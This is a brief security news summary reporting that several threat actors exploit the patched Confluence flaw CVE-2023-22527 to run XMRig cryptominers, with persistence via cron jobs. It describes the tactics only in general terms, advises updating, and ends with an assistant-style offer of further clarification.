August 30, 2024 at 02:42AM
Threat actors are exploiting a patched critical security flaw in Atlassian Confluence Data Center and Confluence Server to conduct illicit cryptocurrency mining. The flaw, CVE-2023-22527, allows unauthenticated attackers to achieve remote code execution. At least three different threat actors are exploiting this vulnerability using various methods. Users are advised to update to the latest versions to minimize risks.
Based on the meeting notes from Aug 30, 2024, the key points are:
– Threat actors are actively exploiting a critical security flaw (CVE-2023-22527) in Atlassian Confluence Data Center and Confluence Server to conduct illicit cryptocurrency mining.
– The attacks involve methods such as deployment of shell scripts and XMRig miners, targeting of SSH endpoints, killing competing crypto mining processes, and maintaining persistence via cron jobs.
– Trend Micro researcher Abdelrahman Esmail highlighted the severity of the vulnerability and observed a high number of exploitation attempts between mid-June and end of July 2024.
– At least three different threat actors are said to be behind the malicious activity, using various techniques to exploit the vulnerability and launch the XMRig miner.
– Esmail emphasized the need for organizations to update their versions of Confluence Data Center and Confluence Server to the latest available versions as soon as possible to minimize the associated risks and threats.
Please let me know if you need further clarification or if there are additional details required.